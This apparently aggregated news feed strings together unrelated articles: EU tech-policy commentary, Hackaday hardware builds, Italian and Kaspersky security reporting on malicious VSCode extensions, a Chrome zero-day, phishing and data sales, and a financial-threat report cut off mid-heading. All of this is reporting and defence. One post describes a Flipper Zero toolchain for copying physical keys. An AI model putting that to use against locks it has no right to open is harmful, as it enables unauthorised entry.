You can understand why Apple is not a fan. But, equally, it will be a boon for the likes of Meta and Alphabet, as well as scores of smaller tech firms, that have long complained that Apple creates artificial technical barriers so that rival devices/apps just don't work as well as the iPhone maker's own offerings. Mark Zuckerberg, Meta's chief executive, even called out Apple in January over how it didn't allow other headphones to connect as well as the firm's (expensive) devices.
Sign up for Digital Politics
Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.
Subscribe
Email sent! Check your inbox to complete your signup.
No spam. Unsubscribe anytime.
Yes, you read that right. The European Commission and Zuckerberg are on the same page when it comes to digital competition.
That complexity can make my brain hurt. In the ongoing lobbying around new digital competition rules (looking at you, United Kingdom), the playbook often relies on claiming such legislation places regulators too squarely at the heart of business decisions of some of the world's largest tech companies. "It's killing innovation!," comes the claim. "Officials should keep their noses out of our business!"
I have some sympathy for that argument, especially when it comes to so-called ex ante regulation, or policy efforts to curb unfair dominance before a firm becomes too entrenched in a digital market. But I can also see a massive upside for consumers if a non-Apple product/service works as effortlessly as an in-house device designed in Cupertino.
For what such competition decisions lead to, we only have to look at a previous European Commission ruling to force the iPhone maker to switch all of its devices over to USB-C technology. Apple executives equally met that 'common charger' ruling with derision. But now, USB-C is the de fault global standard, allowing one cable to connect everything from iPhones to Samsung tablets.
It's still unclear if the recent Apple decision will lead to US pushback after the White House threatened retaliatory tariffs on countries/regions that went after American tech firms. But beyond the iPhone maker, many US companies remain supportive of this specific European Commission competition decision — mostly because it's good for their own business interests.
What I'm reading
— A subcommittee of the US Senate Committee on the Judiciary will hold a hearing on the "Censorship Industrial Complex" on March 24. Watch along here. A counterpoint to that subcommittee's focus.
— Company responses to the White House's call for input on a "AI Action Plan." Palantir. OpenAI. Alphabet. Microsoft. Frontier Model Forum. Anthropic. If anyone has seen Meta's submission, please let me know.
— AI Now gives the European Commission a report card on tech for the Berlaymont Building's first 100 days. More here.
— The UK regulator Ofcom outlined what companies must now do after a deadline passed for firms to conduct illegal harms risk assessments. More here.
— Small AI language models offer a cheap option for indigenous communities to take advantage of this emerging technology, argue Brooke Tanner and Cameron Kerry for the Brookings Institution.
Build Customized Raspberry Pi OS Images With rpi-image-gen
Recently Raspberry Pi publicly announced the release of their new rpi-image-gen tool, which is advertised as making custom Raspberry Pi OS (i.e. Debian for specific Broadcom SoCs) images in a much more streamlined fashion than with the existing rpi-gen tool, or with third-party solutions. The general idea seems to be that the user fetches the tool from the GitHub project page, before running the build.sh script with parameters defining the configuration file and other options.
The main advantage of this tool is said to be that it uses binary packages rather than (cross-)compiling, while providing a range of profiles and configuration layers to target specific hardware & requirements. Two examples are provided in the GitHub project, one for a ‘slim’ project, the other for a ‘webkiosk‘ configuration that runs a browser in a restricted (Cage) environment, with required packages installed in the final image.
Looking at the basic ‘slim’ example, it defines the INI-style configuration in config/pi5-slim.cfg, but even when browsing through the main README it’s still somewhat obtuse. Under device it references the mypi5 subfolder which contains its own shell script, plus a cmdline.txt and fstab file. Under image it references the compact subfolder with another bunch of files in it. Although this will no doubt make a lot more sense after taking a few days to prod & poke at this, it’s clear that this is not a tool for casual users who just want to quickly put a custom image together.
This is also reflected in the Raspberry Pi blog post, which strongly insinuates that this is targeting commercial & industrial customers, rather than hobbyists.
VSCode Marketplace Distribuiva Ransomware! Scoperte Delle Estensioni Malevole
Sono state scoperte due estensioni dannose nel VSCode Marketplace che nascondevano un ransomware. Uno di questi è apparso sullo store Microsoft nell’ottobre dell’anno scorso, ma è passato inosservato per molto tempo.
Si tratta delle estensioni ahban.shiba e ahban.cychelloworld che sono attualmente state rimosse dallo store. Inoltre, l’estensione ahban.cychelloworld è stata caricata sullo store il 27 ottobre 2024 e ahban.shiba il 17 febbraio 2025, aggirando tutti i controlli di sicurezza.
Il malware è stato individuato dagli esperti di ReversingLabs, che hanno scritto che entrambe le estensioni contenevano un comando PowerShell che scaricava ed eseguiva un altro script PowerShell da un server Amazon AWS remoto. Questo script era responsabile della distribuzione del ransomware.
Secondo i ricercatori, il ransomware è chiaramente in fase di sviluppo o test, poiché al momento crittografa solo i file nella cartella C:\users\%username%\Desktop\testShiba e non tocca gli altri.
Una volta completata la crittografia, lo script visualizza un avviso sullo schermo: “I tuoi file sono crittografati. Per ripristinarli, paga 1 ShibaCoin a ShibaWallet.” Non ci sono istruzioni aggiuntive o altri requisiti, a differenza dei classici attacchi ransomware.
Dopo che i ricercatori di ReversingLabs hanno informato Microsoft del ransomware, l’azienda ha rapidamente rimosso entrambe le estensioni dal VSCode Marketplace.
Italy Kruk, ricercatore di sicurezza di ExtensionTotal, che aveva eseguito la scansione automatica precedentemente, aveva rilevato queste estensioni dannose nel VSCode Marketplace, ma lo specialista non era riuscito a contattare i rappresentanti dell’azienda.
Crook spiega che ahban.cychelloworld non era originariamente dannoso e che il ransomware è apparso dopo il caricamento della versione 0.0.2, accettata sul VSCode Marketplace il 24 novembre 2024. Dopo di che, l’estensione ahban.cychelloworld ha ricevuto altri cinque aggiornamenti e tutti contenevano codice dannoso.
“Abbiamo segnalato ahban.cychelloworld a Microsoft il 25 novembre 2024, tramite un report automatico generato dal nostro scanner. Forse a causa del numero esiguo di installazioni di questa estensione, Microsoft non ha dato priorità al messaggio”, ha detto l’esperto.
Gli esperti hanno notato che entrambe le estensioni scaricavano ed eseguivano script PowerShell remoti, ma sono riuscite a non essere rilevate per diversi mesi, il che indica chiaramente gravi falle nei processi di verifica di Microsoft.
L'articolo VSCode Marketplace Distribuiva Ransomware! Scoperte Delle Estensioni Malevole proviene da il blog della sicurezza informatica.
dk9x23 - Armarsi, perché, per chi?
Spendiamo 800 miliardi per riarmare l'Europa?
Benissimo. Contro chi, e per fare cosa?
E poi... siamo sicuri che serva? (Spoiler: NO)
spreaker.com/episode/dk9x23-ar…
Admit it. You Want This Go-Kart
Many of us could have been lucky enough to have some form of pedal go-kart in our formative years, and among such lucky children there can have been few who did not wish for their ride to have a little power. Zipping around the neighborhood remained a strenuous affair though, particularly for anyone whose hometown was on a hill. What a shame we didn’t have [Matto Godoy] as a dad then, because he has taken a child’s go-kart and turned it into the electrically-propelled ride of dreams.
Out come the pedals and in goes a wooden floor panel, and at the rear the axle is replaced by a set of hoverboard motors and associated batteries and controllers. The wheels are off-the-shelf wheelbarrow parts, and the 36 V lithium-polymer gives it plenty of go. It looks too small for us, but yes! We want one.
If you want one too, you could do worse than considering a Hacky Racer. And if more motor power is your thing, raid the auto recyclers!
Grave Zero-day rilevato in Chrome! Gli Hacker di stato stanno sfruttando questa falla critica
Recentemente Google ha rilasciato un urgente bug fix relativo ad una nuova vulnerabilità monitorata con il CVE-2025-2783. Si tratta di una grave falla di sicurezza su Chrome Browser che è stata sfruttata in attacchi attivi.
L’attacco è stato sferrato attraverso e-mail di phishing che hanno preso di mira organi di stampa, istituti scolastici e organizzazioni governative in Russia. Inoltre, il CVE-2025-2783 è progettato per essere eseguito insieme a un exploit aggiuntivo che facilita l’esecuzione di codice remoto.
“Google è a conoscenza di segnalazioni secondo cui esiste in natura un exploit per CVE-2025-2783”, ha riportato nella correzione Google in un avviso tecnico. Google non ha rivelato ulteriori dettagli tecnici sulla natura degli attacchi. La vulnerabilità è stata inserita in Chrome versione 134.0.6998.177/.178 per Windows.
La vulnerabilità, viene identificata con il nome Mojo facendo riferimento a una raccolta di librerie di runtime che forniscono un meccanismo indipendente dalla piattaforma per la comunicazione tra processi (IPC).
“In tutti i casi, l’infezione si è verificata immediatamente dopo che la vittima ha cliccato su un link in un’e-mail di phishing e il sito web degli aggressori è stato aperto tramite il browser web Google Chrome”, hanno affermato i ricercatori . “Non è stata richiesta alcuna ulteriore azione per essere infettati. L’essenza della vulnerabilità è dovuta a un errore logico all’intersezione tra Chrome e il sistema operativo Windows, che consente di aggirare la protezione sandbox del browser.”
“Tutti gli artefatti di attacco analizzati finora indicano un’elevata sofisticatezza degli aggressori, consentendoci di concludere con sicurezza che dietro questo attacco c’è un gruppo APT sponsorizzato da uno stato”, hanno affermato i ricercatori.
Il CVE-2025-2783, è il primo zero-day di Chrome attivamente sfruttato dall’inizio dell’anno. I ricercatori di Kaspersky Boris Larin e Igor Kuznetsov sono stati accreditati per aver scoperto e segnalato la falla il 20 marzo 2025.
Il fornitore russo di sicurezza informatica, nel suo stesso bollettino, ha caratterizzato lo sfruttamento zero-day di CVE-2025-2783 come un attacco mirato tecnicamente sofisticato, indicativo di una minaccia persistente avanzata (APT). Sta monitorando l’attività con il nome di Operation ForumTroll.
Si dice che i link di breve durata siano stati personalizzati per i bersagli, con lo spionaggio come obiettivo finale della campagna. Le email dannose, ha affermato Kaspersky, contenevano inviti presumibilmente provenienti dagli organizzatori di un legittimo forum scientifico ed esperto, Primakov Readings.
L'articolo Grave Zero-day rilevato in Chrome! Gli Hacker di stato stanno sfruttando questa falla critica proviene da il blog della sicurezza informatica.
Designing a Portable Mac Mini
When Apple first launched the Macintosh, it created a new sort of “Lunchbox” form factor that was relatively portable and very, very cool. Reminiscent of that is this neat portable Macintosh Mini, created by [Scott Yu-Jan].
[Scott] has created something along these lines before—putting an iPad dock on top of a Macintosh Studio to create a look vaguely reminiscent of the very first Macintosh computers. However, that build wasn’t portable—it wasn’t practical to build such a thing around the Macintosh Studio. In contrast, the Mac Mini is a lithe, lightweight thing that barely sups power—it’s much more suitable for a “luggable” computer.
The build relies on a 3D printed enclosure that wraps around the Mac Mini like a glove. Inside, there’s a chunky 20,800 mAh power bank with enough juice to run the computer for over three hours. Just like the original Mac, there’s a handle on top, too. The build’s main screen is actually an iPad Mini, hooked up to the Mac Mini. If you want to use it separately, it can be popped out just by pushing it via a cutout in the bottom of the enclosure.
[Scott] notes that it’s cool, but not exactly practical—it weighs seven pounds, mostly due to the weight of the heavy power bank. We’ve featured [Scott’s] stylish builds before, too, like this nice iPhone dock.
youtube.com/embed/IXWmrXt52wM?…
Physical Key Copying Starts With a Flipper Zero
A moment’s inattention is all it takes to gather the information needed to make a physical copy of a key. It’s not necessarily an easy process, though, so if pen testing is your game, something like this Flipper Zero key copying toolchain can make the process quicker and easier when the opportunity presents itself.
Of course, we’re not advocating for any illegal here; this is just another tool for your lock-sports bag of tricks. And yes, there are plenty of other ways to accomplish this, but using a Flipper Zero to attack a strictly mechanical lock is kind of neat. The toolchain posted by [No-Lock216] starts with an app called KeyCopier, which draws a virtual key blank on the Flipper Zero screen. The app allows you to move the baseline for each pin to the proper depth, quickly recording the bitting for the key. Later, the bitting can be entered into an online app called keygen which, along with information on the brand of lock and its warding, can produce an STL file suitable for downloading and printing.
Again, there are a ton of ways to make a copy of a key if you have physical access to it, and the comments of the original Reddit post were filled with suggestions amusingly missing the entire point of this. Yes, you can get a key cut at any hardware store for a buck or two that will obviously last a lot longer than a 3D-printed copy. But if you only have a few seconds to gather the data from the key, an app like KeyCopier could be really convenient. Personally, we’d find a smartphone app handier, but if you’ve got a Flipper, why not leverage it?
Thanks to [JohnU] for the tip.
Brazilian Modders Upgrade NVidia Geforce GTX 970 to 8 GB of VRAM
Although NVidia’s current disastrous RTX 50-series is getting all the attention right now, this wasn’t the first misstep by NVidia. Back in 2014 when NVidia released the GTX 970 users were quickly dismayed to find that their ‘4 GB VRAM’ GPU had actually just 3.5 GB, with the remaining 512 MB being used in a much slower way at just 1/7th of the normal speed. Back then NVidia was subject to a $30/card settlement with disgruntled customers, but there’s a way to at least partially fix these GPUs, as demonstrated by a group of Brazilian modders (original video with horrid English auto-dub).
The mod itself is quite straightforward, with the original 512 MB, 7 Gbps GDDR5 memory modules replaced with 1 GB, 8 Gbps chips and adding a resistor on the PCB to make the GPU recognize the higher density VRAM ICs. Although this doesn’t fix the fundamental split VRAM issue of the ASIC, it does give it access to 7 GB of faster, higher-density VRAM. In benchmarks performance was massively increased, with Unigine Superposition showing nearly a doubling in the score.
In addition to giving this GTX 970 a new lease on life, it also shows just how important having more VRAM on a GPU is, which is ironic in this era where somehow GPU manufacturers deem 8 GB of VRAM to be acceptable in 2025.
youtube.com/embed/JR5mm96Dj7k?…
Operation ForumTroll: APT attack with Google Chrome zero-day exploit chain
In mid-March 2025, Kaspersky technologies detected a wave of infections by previously unknown and highly sophisticated malware. In all cases, infection occurred immediately after the victim clicked on a link in a phishing email, and the attackers’ website was opened using the Google Chrome web browser. No further action was required to become infected.
All malicious links were personalized and had a very short lifespan. However, Kaspersky’s exploit detection and protection technologies successfully identified the zero-day exploit that was used to escape Google Chrome’s sandbox. We quickly analyzed the exploit code, reverse-engineered its logic, and confirmed that it was based on a zero-day vulnerability affecting the latest version of Google Chrome. We then reported the vulnerability to the Google security team. Our detailed report enabled the developers to quickly address the issue, and on March 25, 2025, Google released an update fixing the vulnerability and thanked us for discovering this attack.
Acknowledgement for finding CVE-2025-2783 (excerpt from security fixes included into Chrome 134.0.6998.177/.178)
We have discovered and reported dozens of zero-day exploits actively used in attacks, but this particular exploit is certainly one of the most interesting we’ve encountered. The vulnerability CVE-2025-2783 really left us scratching our heads, as, without doing anything obviously malicious or forbidden, it allowed the attackers to bypass Google Chrome’s sandbox protection as if it didn’t even exist. The cause of this was a logical error at the intersection of Google Chrome’s sandbox and the Windows operating system. We plan to publish the technical details of this vulnerability once the majority of users have installed the updated version of the browser that fixes it.
Our research is still ongoing, but judging by the functionality of the sophisticated malware used in the attack, it seems the attackers’ goal was espionage. The malicious emails contained invitations supposedly from the organizers of a scientific and expert forum, “Primakov Readings”, targeting media outlets, educational institutions and government organizations in Russia. Based on the content of the emails, we dubbed the campaign Operation ForumTroll.
Example of a malicious email used in this campaign (translated from Russian)
At the time of writing, there’s no exploit active at the malicious link – it just redirects visitors to the official website of “Primakov Readings”. However, we strongly advise against clicking on any potentially malicious links.
The exploit we discovered was designed to run in conjunction with an additional exploit that enables remote code execution. Unfortunately, we were unable to obtain this second exploit, as in this particular case it would have required waiting for a new wave of attacks and exposing users to the risk of infection. Fortunately, patching the vulnerability used to escape the sandbox effectively blocks the entire attack chain.
All the attack artifacts analyzed so far indicate high sophistication of the attackers, allowing us to confidently conclude that a state-sponsored APT group is behind this attack.
We plan to publish a detailed report with technical details about the zero-day exploit, the sophisticated malware, and the attackers’ techniques.
Kaspersky products detect the exploits and malware used in this attack with the following verdicts:
- Exploit.Win32.Generic
- Trojan.Win64.Agent
- Trojan.Win64.Convagent.gen
- PDM:Exploit.Win32.Generic
- PDM:Trojan.Win32.Generic
- UDS:DangerousObject.Multi.Generic
Indicators of Compromise
LED Filaments Become Attractive Time Piece
There are a million ways to use LEDs to make a clock. [sjm4306] chose to go a relatively conventional route, making something that approximates a traditional analog timepiece. However, he did it using LED filaments to create a striking and unique design. Thus the name—FilamenTIME!
LED filaments are still relatively new on the scene. They’re basically a bunch of tiny LCDs mounted in a single package to create a single “filament” of light that appears continuous. It’s great if you want to create a bar of light without messing around with populating tons of parts and having to figure out diffusion on your own.
[sjm4306] used them to create glowing bar elements in a clock for telling the time. The outer ring contains 60 filaments for the 60 minutes in an hour, while the inner ring contains 12 filaments to denote the hours themselves. To handle so many LEDs, there are 9 shift registers on board. They’re driven by an ATmega328P which runs the show, with a DS3232MZ real-time clock onboard for keeping time. As you might imagine, creating such a large circular clock required a large PCB—roughly a square foot in size. It doesn’t come cheap, though [sjm4306] was lucky enough to have sponsorship to cover the build. [sjm4306] is still working on the firmware, and hopes to build a smaller, more compact version, which should cut costs compared to the large single board.
It’s a neat clock, and we’d know, having seen many a timepiece around these parts. Video after the break.
youtube.com/embed/KHyncdWXaz8?…
The Vectrex Home Computer You Never Had
The Vectrex console from the early 1980s holds a special place in retrocomputing lore thanks to its vector display — uniquely for a home system, it painted its graphics to the screen by drawing them with an electron beam, instead of scanning across a raster as a TV screen would. It thus came with its own CRT, and a distinctive vertical screen form factor.
For all that though, it was just a games console, but there were rumors that it might have become more. [Intric8] embarked on a quest to find some evidence, and eventually turned up what little remains in a copy of Electronic Games magazine. A keyboard, RAM and ROM expansion, and a wafer drive were in the works, which would have made the Vectrex a quirky equal of most of what the likes of Commodore and Sinclair had to offer.
It’s annoying that it doesn’t specify which issue of the magazine has the piece, and after a bit or browsing archive.org we’re sorry to say we can’t find it ourselves. But the piece itself bears a second look, for what it tells us about the febrile world of the 8-bit games industry. This was a time of intense competition in the period around the great console crash, and developers would claim anything to secure a few column inches in a magazine. It’s not to say that the people behind the Vectrex wouldn’t have produced a home computer add-on for it if they could have done, but we remember as teenagers being suckered in by too many of these stories. We still kinda want one, but we’d be surprised if any ever existed.
If you have a Vectrex, it’s possible to give it a light pen.
Ancient Pocket Computer Gets a Serious Serial Upgrade
[Robert’s Retro] is one of those great YouTube channels that shows us the ins and outs of old and obscure computers. [Robert] likes going a step beyond the traditional teardown though, repairing and upgrading these old machines. His latest project involves giving the ZEOS Pocket PC a fully-functional serial port.
If you’re unfamiliar with the ZEOS Pocket PC, you might know it as the Tidalwave PS-1000—it’s a pretty straightforward clone. Originally, these machines could be had with a proprietary serial adapter to enable them to interface with external peripherals. However, like most obscure cables and connectors from three decades ago, they’re virtually unobtainable today.
To solve this problem, [Robert] decided to hack in a traditional DE-9 connector instead. Commonly referred to as the DB-9, this is the most common serial port design used on IBM PCs and compatibles. Getting the larger port into the compact PC required some careful hacking of the case, as well as delicate soldering to hook up the pins to the right signals on the tightly-packed motherboard. This video does involve cutting some vintage plastic, but overall it’s a very neat mod that is handled with due respect and care.
This isn’t the first time we’ve seen him upgrade a classic portable computer, either.
youtube.com/embed/8IdkVxCv1t8?…
2024 Hackaday Supercon Talk: Killing Mosquitoes with Freaking Drones, and Sonar
Suppose that you want to get rid of a whole lot of mosquitoes with a quadcopter drone by chopping them up in the rotor blades. If you had really good eyesight and pretty amazing piloting skills, you could maybe fly the drone yourself, but honestly this looks like it should be automated. [Alex Toussaint] took us on a tour of how far he has gotten toward that goal in his amazingly broad-ranging 2024 Superconference talk. (Embedded below.)
The end result is an amazing 380-element phased sonar array that allows him to detect the location of mosquitoes in mid-air, identifying them by their particular micro-doppler return signature. It’s an amazing gadget called LeSonar2, that he has open-sourced, and that doubtless has many other applications at the tweak of an algorithm.
Rolling back in time a little bit, the talk starts off with [Alex]’s thoughts about self-guiding drones in general. For obstacle avoidance, you might think of using a camera, but they can be heavy and require a lot of expensive computation. [Alex] favored ultrasonic range finding. But then an array of ultrasonic range finders could locate smaller objects and more precisely than the single ranger that you probably have in mind. This got [Alex] into beamforming and he built an early prototype, which we’ve actually covered in the past. If you’re into this sort of thing, the talk contains a very nice description of the necessary DSP.
For this, he uses the micro-doppler signatures that the different wing beats of the various insects put out. Wasps have a very wide-band doppler echo – their relatively long and thin wings are moving slower at the roots than at the tips. Flies, on the other hand, have stubbier wings, and emit a tighter echo signal. The mosquito signal is even tighter.
If you us that you could use sonar to detect mosquitoes at a distance of a few meters, much less locate them and differentiate them from their other insect brethren, we would have thought that it was impossible. But [Alex] and his team are building these devices, and you can even build one yourself if you want. So watch the talk, learn about phased arrays, and start daydreaming about what you would use something like this for.
youtube.com/embed/6ScCG3qTOuc?…
Truffa ai danni dell’INPS! Il Tuo Documento è in Vendita nel Dark Web? Siate sempre vigili e attenti!
Il CERT-AgID ha più volte segnalato attività di smishing a tema INPS che continuano a colpire il territorio italiano. L’obiettivo, come già evidenziato, è il furto di copie di documenti di identità, con particolare interesse per i selfie in cui il documento è mostrato accanto al volto della vittima.
Oltre a vagliare le segnalazioni quotidiane provenienti dalle pubbliche amministrazioni – con l’INPS in prima linea – e dai cittadini che ci riportano le attività sospette in corso, il CERT-AGID ha attivato un monitoraggio costante dedicato del fenomeno, avviando le procedure di takedown (quando possibile) per richiedere ai registrar la rimozione immediata dei domini individuati e condividendo gli indicatori di compromissione (IoC) rilevati con le strutture pubbliche accreditate.
Nonostante gli sforzi congiunti con le strutture proposte, le campagne non accennano a diminuire ed il numero di vittime continua a crescere.
Come evidenziato nel grafico seguente, negli ultimi cinque anni le attività fraudolente si sono intensificate in modo significativo e, solo nei primi tre mesi del 2025, sono stati individuati 33 falsi domini INPS creati appositamente per sottrarre documenti di identità alle vittime.
I dati rubati possono essere utilizzati per diverse attività illecite, principalmente per il furto d’identità digitale (SPID) o per la vendita dei documenti nel dark web.
Proprio riguardo a quest’ultima attività, il CERT-AGID ha rilevato la vendita online di documenti di cittadini italiani, completi di selfie, su un noto forum del deep web.
L’annuncio descrive in modo esplicito il contenuto del pacchetto in vendita: documenti di identità con selfie e copie fronte-retro dei documenti.
A supporto, vengono forniti tre link a immagini che mostrano cittadini italiani con il proprio documento di identità accanto al volto. Il tutto corrisponde esattamente alle richieste di documenti avanzate dai falsi siti che si spacciano per quello di INPS, promettendo un rimborso economico inesistente.
Per aumentare la consapevolezza sull’argomento e rispondere ai numerosi quesiti che riceviamo quotidianamente, il CERT-AGID ha realizzato una guida dedicata che spiega nel dettaglio come riconoscere i segnali della truffa e come agire se si è vittime di questo genere di frode.
Quindi quando sei di fronte a qualcosa di sospetto: ti fermi, respiri e cerchi di capire che cosa è successo… Come sempre siate attenti, siate vigili e ricordate: l’inganno più pericoloso è quello che non ti aspetti.
L'articolo Truffa ai danni dell’INPS! Il Tuo Documento è in Vendita nel Dark Web? Siate sempre vigili e attenti! proviene da il blog della sicurezza informatica.
ReactOS 0.4.15 Released With Major Improvements
Recently the ReactOS project released the much anticipated 0.4.15 update, making it the first major release since 2020. Despite what might seem like a minor version bump from the previous 0.4.14 release, the update introduces sweeping changes to everything from the kernel to the user interface and aspects like the audio system and driver support. Those who have used the nightly builds over the past years will likely have noticed a lot of these changes already.
A notable change is to plug-and-play support which enables more third party drivers and booting from USB storage devices. The Microsoft FAT filesystem driver from the Windows Driver Kit can now be used courtesy of better compatibility, there is now registry healing, and caching and kernel access checks are implemented. The latter improvement means that many ReactOS modules can now work in Windows too.
On the UI side there is a much improved IME (input method editor) feature, along with native ZIP archive support and various graphical tweaks.
Meanwhile since 0.4.15 branched off the master branch six months ago, the latter has seen even more features added, including SMP improvements, UEFI support, a new NTFS driver and improvements to power management and application support. All of this accompanied by many bug fixes, which makes it totally worth it to regularly check out the nightly builds.
Un Threat Actors Rivendica un Attacco informatico all’italiana Eprice. Possibile vendita di dati del 2008
Nella giornata di ieri, nel noto forum del dark web BreachForum, l’utente dallo pseudonimo Alcxtraze sostiene di aver trafugato un database del noto sito italiano di e-commerce eprice.it. La quantità dei dati esfiltrati/trafugati da quanto riportato nel forum underground sembra essere molto importate, circa 6,8 milioni di record.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché l’organizzazione coinvolta non ha ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence.
Da un’analisi del post pubblicato nell’underground, osservando i sample “offerti” dal criminale informatico, sembra trattarsi di un database contenente gli ordini effettuati sul sito.
I dati, almeno quelli presenti nei sample, appaiono piuttosto datati (ndr: le date risalgono al 2008), il che ci porta a ipotizzare che anche i dati esfiltrati siano molto vecchi. Non risultano presenti informazioni sensibili come dettagli di pagamento o numeri di carte di credito, né credenziali di accesso (login e password). Tuttavia, sono visibili in chiaro i dati personali dei clienti, inclusi gli indirizzi utilizzati per la spedizione degli ordini.
Il prezzo di vendita non è stato fissato: l’autore del post invita gli interessati a presentare un’offerta. È inoltre specificato che il database verrà venduto a un solo acquirente. Non è possibile stabilire con certezza se l’utente che ha messo in vendita il database sia anche il threat actor responsabile dell’attacco e dell’esfiltrazione. Quel che è certo è che Alcxtraze gode di un’ottima reputazione su BreachForum e, nelle ultime ore, ha pubblicato in vendita diversi database relativi ad altri siti esteri.
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzareredhotcyber.com/whistleblowerla mail crittografata del whistleblower.
L'articolo Un Threat Actors Rivendica un Attacco informatico all’italiana Eprice. Possibile vendita di dati del 2008 proviene da il blog della sicurezza informatica.
Financial cyberthreats in 2024
As more and more financial transactions are conducted in digital form each year, financial threats comprise a large piece of the global cyberthreat landscape. That’s why Kaspersky researchers analyze the trends related to these threats and share an annual report highlighting the main dangers to corporate and consumer finances. This report contains key trends and statistics on financial phishing, mobile and PC banking malware, as well as offers actionable recommendations to bolster security measures and effectively mitigate emerging threats
Methodology
In this report, we present an analysis of financial cyberthreats in 2024, focusing on banking Trojans and phishing pages that target online banking, shopping accounts, cryptocurrency wallets and other financial assets. To gain an understanding of the financial threat landscape, we analyzed anonymized data on malicious activities detected on the devices of Kaspersky security product users and consensually provided to us through the Kaspersky Security Network (KSN). Note that for mobile banking malware, we retrospectively revised the 2023 numbers to provide more accurate statistics. We also changed the methodology for PC banking malware by removing obsolete families that no longer use Trojan banker functionality, hence the sharp drop in numbers against 2023.
Key findings
Phishing
- Banks were the most popular lure in 2024, accounting for 42.58% of financial phishing attempts.
- Amazon Online Shopping was mimicked by 33.19% of all phishing and scam pages targeting online store users in 2024.
- Cryptocurrency phishing saw an 83.37% year-over-year increase in 2024, with 10.7 million detections compared to 5.84 million in 2023.
PC malware
- The number of users affected by financial malware for PCs dropped from 312,000 in 2023 to 199,000 in 2024.
- ClipBanker, Grandoreiro and CliptoShuffler were the prevalent malware families, together targeting over 89% of affected users.
- Consumers remained the primary target of financial cyberthreats, accounting for 73.69% of attacks.
Mobile malware
- Nearly 248,000 users encountered mobile banking malware in 2024 – almost 3.6 times more than in 2023 when 69,000 users were affected.
- Mamont was the most active Android malware family, accounting for 36.7% of all mobile banker attacks.
- Users in Turkey were the most targeted.
Financial phishing
In 2024, online fraudsters continued to lure users to phishing and scam pages that mimicked the websites of popular brands and financial organizations. The attackers employed social engineering techniques to trick victims into sharing their financial data or making a payment on a fake page.
We analyzed phishing detections separately for users of our home and business products. Pages mimicking web services accounted for the largest slice of the business pie at 26.56%. The percentage was lower for home users (10.34%), but home users were more likely to be targeted by pages using banks and global internet portals, social media and IMs, payment systems, and online games as a lure. Delivery company scams accounted for 15.17% of attacks targeting businesses, but did not register in the top ten for home users.
TOP 10 organizations mimicked by phishing and scam pages that were blocked on business users’ devices, 2024 (download)
TOP 10 organizations mimicked by phishing and scam pages that were blocked on home users’ devices, 2024 (download)
Overall, among the three major financial phishing categories, bank users were targeted most in 2024 (42.58%), rising a little over 4 p.p. on the previous year. Online stores were of relatively less interest to the fraudsters at 38.15% dropping from 41.65% in 2023. Payment systems accounted for the remaining 19.27%.
Distribution of financial phishing pages by category, 2024 (download)
Online shopping scams
The most popular online brand target for fraudsters was Amazon (33.19%). This should not come as a surprise given Amazon is one of the world’s largest online retailers. With 2.41 billion average monthly visitors and $447.5 billion in annual web sales, up 8.6% in 2024, there is every chance Amazon will retain its dubious honor into 2025.
Apple’s share of attacks dropped nearly 3 p.p. from last year’s figure to 15.68%, while Netflix scams grew slightly to 15.99%. Meanwhile, fraudsters’ interest in Alibaba increased, its share going up from 3.17% in 2023 to 7.95% in 2024.
Examples of phishing sites that mimic Amazon, Netflix, Apple and Alibaba
Last year, Louis Vuitton accounted for a whopping 5.52% of all attacks. However, the luxury brand completely slipped out of the top ten in 2024, along with Italian eyewear company Luxottica. Instead, sportswear giant Adidas and Russian e-commerce platform Ozon entered the list with 1.39% and 2.75% respectively. eBay (4.35%), Shopify (3.82%), Spotify (2.84%) and Mercado Libre (1.86%) all stayed in the top ten, with marginal differences from the previous year.
TOP 10 online shopping brands mimicked by phishing and scam pages, 2024 (download)
When looking at fake website content, free prizes and offers that were a little too good to be true once again proved a popular tactic used by scammers. However tempting they may be, most likely, the victim will be the one who pays. Often scammers require “commissions” to get the prize or ask user to pay for delivery. After receiving the money, they disappear.
Examples of scam pages offering free prizes
In other cases, precious gifts are used by phishers to trick the user into giving out their credentials. The scheme below offers the victim an Amazon gift card to obtain which they should enter an OTP code on a phishing website. Although such codes are temporary, the scammers may use them to log in to victim’s account or perform a fraudulent transaction as soon as it is entered into the fake form.
A phishing scheme aimed at getting OTP codes
Fraudsters often trick users into “verifying” their accounts by sending fake security alerts or urgent messages claiming suspicious activity. Victims are directed to a counterfeit page resembling platforms like eBay, where entering data (for example, credentials, payment data or documents) hands them over to scammers.
An example of a phishing site that mimics eBay
Another common tactic involves creating fake storefronts or seller profiles on marketplaces, listing numerous products at seemingly irresistible prices. Shoppers drawn in by the deals unknowingly provide payment details, only to receive nothing in return.
An example of a scam site that mimics an online marketplace
While many pages mimicking online stores target shoppers, there are others that are designed to collect business account credentials. For example, below you can see a phishing page targeting users registered on the Amazon Brand Registry platform, which provides businesses with a range of brand-building and intellectual property protection tools.
An example of a phishing page targeting Amazon brand accounts
Payment system phishing
Payment systems were mimicked in 19.27% of financial phishing attacks detected and blocked by Kaspersky products in 2024 – almost the same percentage as in 2023. Once again, PayPal was the most targeted, but its share of attacks fell from 54.73% to 37.53%. Attacks targeting Mastercard went in the opposite direction, nearly doubling from 16.58% in 2023 to 30.54%. American Express, Qiwi and Cielo are all new entrants into the top five, replacing Visa, Interac and PayPay.
TOP 5 payment systems mimicked by phishing and scam pages, 2024 (download)
Cryptocurrency scams
